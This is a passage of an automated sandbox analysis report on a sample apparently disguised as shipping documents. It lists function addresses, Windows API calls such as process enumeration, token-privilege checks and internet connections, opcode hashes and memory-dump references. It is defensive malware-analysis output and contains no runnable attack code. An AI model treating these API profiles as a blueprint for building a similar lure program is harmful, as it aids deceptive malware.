                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 420147892-0
                                                                                    • Opcode ID: 9f72408431bb87bff2ef66aa8029493d2a8c12a344ad346b4d77a9c97555e29d
                                                                                    • Instruction ID: f5f4abf25ae61c05916f864eb3467b3f5a680cff59a95e588ec4ad4cce3a4f9a
                                                                                    • Opcode Fuzzy Hash: 9f72408431bb87bff2ef66aa8029493d2a8c12a344ad346b4d77a9c97555e29d
                                                                                    • Instruction Fuzzy Hash: 4431B1711083059FC301EF50D891BBFBBE8EF95354F4008ADF882861A1EFB19A49CB52
                                                                                    Function 00BDC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • GetCursorPos.USER32(?), ref: 00BDC4D2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B8B9AB,?,?,?,?,?), ref: 00BDC4E7
                                                                                    • GetCursorPos.USER32(?), ref: 00BDC534
                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B8B9AB,?,?,?), ref: 00BDC56E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2864067406-0
                                                                                    • Opcode ID: 10ee2acc0bb627068e197cc2465b6fedaf30b3dc989d60de21562cc10f639d79
                                                                                    • Instruction ID: 7fbc241000135038ad5f8dc724c1522b03951703d867499f51a2364b6a4b0498
                                                                                    • Opcode Fuzzy Hash: 10ee2acc0bb627068e197cc2465b6fedaf30b3dc989d60de21562cc10f639d79
                                                                                    • Instruction Fuzzy Hash: E731A035600018EFCB158F98D899EEEBFF5EB4A314F0440A6F9058B3A1DB31AD50DBA4
                                                                                    Function 00BA8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                                                      • Part of subcall function 00BA810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                                                      • Part of subcall function 00BA810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                                                      • Part of subcall function 00BA810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8141
                                                                                      • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA86A3
                                                                                    • _memcmp.LIBCMT ref: 00BA86C6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA86FC
                                                                                    • HeapFree.KERNEL32(00000000), ref: 00BA8703
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 1592001646-0
                                                                                    • Opcode ID: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                                                                    • Instruction ID: c8cac99c2fa3c07f7cfedddd4996b497d776d812b0d5ef0d7f6439acc3feffbd
                                                                                    • Opcode Fuzzy Hash: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                                                                    • Instruction Fuzzy Hash: D8219071E45109EFEB10DFA8CA49BEEB7F8EF45305F158099E455A7240EB30AE09CB90
                                                                                    Function 00B7098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __setmode.LIBCMT ref: 00B709AE
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                                                                    • _fprintf.LIBCMT ref: 00B709E5
                                                                                    • OutputDebugStringW.KERNEL32(?), ref: 00BA5DBB
                                                                                      • Part of subcall function 00B74AAA: _flsall.LIBCMT ref: 00B74AC3
                                                                                    • __setmode.LIBCMT ref: 00B70A1A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                    • String ID:
                                                                                    • API String ID: 521402451-0
                                                                                    • Opcode ID: dca3761379a59fa681fd2bf15eb75528e9220bc286c4905bb3343daa7f865082
                                                                                    • Instruction ID: d5466c657344e2b6bcc742b1407544c368ca661b81b24687dd849c669a6f48d5
                                                                                    • Opcode Fuzzy Hash: dca3761379a59fa681fd2bf15eb75528e9220bc286c4905bb3343daa7f865082
                                                                                    • Instruction Fuzzy Hash: EB113A31908608BFDB04B7B49C86AFE77E8DF42322F2481E6F52957192EF705D4687A1
                                                                                    Function 00BC1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC17A3
                                                                                      • Part of subcall function 00BC182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                                                      • Part of subcall function 00BC182D: InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseConnectHandleOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1463438336-0
                                                                                    • Opcode ID: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                                                                    • Instruction ID: fb625cca2fc04c7cb31271128541144cf6e72ff9b7e8103ce747f40803c95701
                                                                                    • Opcode Fuzzy Hash: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                                                                    • Instruction Fuzzy Hash: FD212371208601BFEB128F64CC40FBABBE9FF4A701F10442EFA01A7652DB31D810A7A0
                                                                                    Function 00BB3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(?,00BDFAC0), ref: 00BB3A64
                                                                                    • GetLastError.KERNEL32 ref: 00BB3A73
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB3A82
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDFAC0), ref: 00BB3ADF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                    • String ID:
                                                                                    • API String ID: 2267087916-0
                                                                                    • Opcode ID: 6baf07779ff962a637cb8a2598c3ce8cbd76cf406ee9d4118d763f2c4270bd21
                                                                                    • Instruction ID: b0674166f028431dc7099248bb3d81a7e60a11efe3d5398fd25da0e80cc2ef74
                                                                                    • Opcode Fuzzy Hash: 6baf07779ff962a637cb8a2598c3ce8cbd76cf406ee9d4118d763f2c4270bd21
                                                                                    • Instruction Fuzzy Hash: 9B21D8745082019F8310DF24D8918BEB7E4EF55764F244AAEF4D9C72A1EB71DE09CB42
                                                                                    Function 00BADCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BAF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF0CB
                                                                                      • Part of subcall function 00BAF0BC: lstrcpyW.KERNEL32(00000000,?,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BAF0F1
                                                                                      • Part of subcall function 00BAF0BC: lstrcmpiW.KERNEL32(00000000,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF122
                                                                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADCEC
                                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD12
                                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD46
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                                    • String ID: cdecl
                                                                                    • API String ID: 4031866154-3896280584
                                                                                    • Opcode ID: 46d7110aa158e209aa1125e1d5278c445d818058aa5a57e2194c3fa89fb56c4f
                                                                                    • Instruction ID: ee9fdd17f1f90df0d15e94ef4235979443c608137007e54e5d80360c7df0ae29
                                                                                    • Opcode Fuzzy Hash: 46d7110aa158e209aa1125e1d5278c445d818058aa5a57e2194c3fa89fb56c4f
                                                                                    • Instruction Fuzzy Hash: C011D03A204306EFCB25AF74C845DBA77E9FF46350B4080BAF856CB2A0EB719941C790
                                                                                    Function 00B850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00B85101
                                                                                      • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 614378929-0
                                                                                    • Opcode ID: cd6a233b4a4c5273d03941683bbddc3e4c62980de129f9397eec84f2b033718d
                                                                                    • Instruction ID: cad78512df26f50d9c17c8967276d05957e7182fc2c7d309c93c47644335fd87
                                                                                    • Opcode Fuzzy Hash: cd6a233b4a4c5273d03941683bbddc3e4c62980de129f9397eec84f2b033718d
                                                                                    • Instruction Fuzzy Hash: 9D11E372905A12AECB313F70EC4D76D37D8EB00361B1085AAF919AA260DF31C940D794
                                                                                    Function 00B544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 00B544CF
                                                                                      • Part of subcall function 00B5407C: _memset.LIBCMT ref: 00B540FC
                                                                                      • Part of subcall function 00B5407C: _wcscpy.LIBCMT ref: 00B54150
                                                                                      • Part of subcall function 00B5407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                                                                    • KillTimer.USER32(?,00000001,?,?), ref: 00B54524
                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B54533
                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B8D4B9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                    • String ID:
                                                                                    • API String ID: 1378193009-0
                                                                                    • Opcode ID: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                                                                    • Instruction ID: 97f5a9dc25798cc3a40629b7449d7e4da601bf7907d6368109a1aea3dd41290a
                                                                                    • Opcode Fuzzy Hash: 98e9529d2a7efed903f105bc4c826c80fdb97a4a40fdc8e8ac6c2e8cb8dd261c
                                                                                    • Instruction Fuzzy Hash: 03210770908784AFE7329B249895BE6BBECEF11319F0800DEE69E57291D7746988CB41
                                                                                    Function 00BC6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                                                      • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                                                                    • gethostbyname.WSOCK32(?), ref: 00BC6399
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00BC63A4
                                                                                    • _memmove.LIBCMT ref: 00BC63D1
                                                                                    • inet_ntoa.WSOCK32(?), ref: 00BC63DC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                    • String ID:
                                                                                    • API String ID: 1504782959-0
                                                                                    • Opcode ID: a5b23f1ef13bd458e7d82048ce77c497f475bdaca900c9402957b36f4a2ae2ad
                                                                                    • Instruction ID: 911e22a4bd592f9e4c35cff9dc8a0ef09b3264ec5c433e9906e25b92a9602068
                                                                                    • Opcode Fuzzy Hash: a5b23f1ef13bd458e7d82048ce77c497f475bdaca900c9402957b36f4a2ae2ad
                                                                                    • Instruction Fuzzy Hash: 7B112171904109EFCB04FBA4DD96EAEB7F8AF04311B1441E9F906A7261EF319E18DB61
                                                                                    Function 00BA8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00BA8B61
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B73
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8B89
                                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BA8BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                                                                    • Instruction ID: 8ca97d6eaef61a8f83bbf630862339404cb4a96d21e3f517b596e377c169aadd
                                                                                    • Opcode Fuzzy Hash: fea92ee234b7880881fa19a8d47ee16deb1074d1352682b6e03bef8d653fd212
                                                                                    • Instruction Fuzzy Hash: DB113A79901218BFDB10DB95C884EADBBB4EB48310F204095E900B7290DA716E10DBA4
                                                                                    Function 00B51290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 00B512D8
                                                                                    • GetClientRect.USER32(?,?), ref: 00B8B5FB
                                                                                    • GetCursorPos.USER32(?), ref: 00B8B605
                                                                                    • ScreenToClient.USER32(?,?), ref: 00B8B610
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                                    • String ID:
                                                                                    • API String ID: 4127811313-0
                                                                                    • Opcode ID: 872ce333256c1337a5fafa63ee60a6565a7d72810925b239de70454b834a492e
                                                                                    • Instruction ID: 31b9e1e43056c6b4cd683374c1fcc8cb351ce029f41caa58a9645e9f6d289da3
                                                                                    • Opcode Fuzzy Hash: 872ce333256c1337a5fafa63ee60a6565a7d72810925b239de70454b834a492e
                                                                                    • Instruction Fuzzy Hash: 97111935501019FBCB00DF98D885AFEB7F8EB05305F404896E901E7250D731AA55CBA5
                                                                                    Function 00BB1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB115F
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB1184
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB118E
                                                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00BAFCED,?,00BB0D40,?,00008000), ref: 00BB11C1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CounterPerformanceQuerySleep
                                                                                    • String ID:
                                                                                    • API String ID: 2875609808-0
                                                                                    • Opcode ID: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                                                                    • Instruction ID: 6fcc191a99c5175a8ad09bb1ac0bafa4106ef16b4cdf1efc6efa9d40c7e5b25d
                                                                                    • Opcode Fuzzy Hash: ec3477b2a2052f948105a7bc4b61a8e4ad4e081de9a20dc7a983ebe9b4210742
                                                                                    • Instruction Fuzzy Hash: 18115A31C0551DE7CF009FA9D898AFEBBB8FF09751F404496EA41B6240DBB09550CBA1
                                                                                    Function 00BAD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BAD84D
                                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00BAD864
                                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00BAD879
                                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00BAD897
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                                    • String ID:
                                                                                    • API String ID: 1352324309-0
                                                                                    • Opcode ID: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
                                                                                    • Instruction ID: 4cee9ab03568ad9095fab0dac93962cc471de50711340d5854a94266fa1be779
                                                                                    • Opcode Fuzzy Hash: e446b4dca297c5f031df9475874f42152a5017f1e4695e3266937342e45c93f3
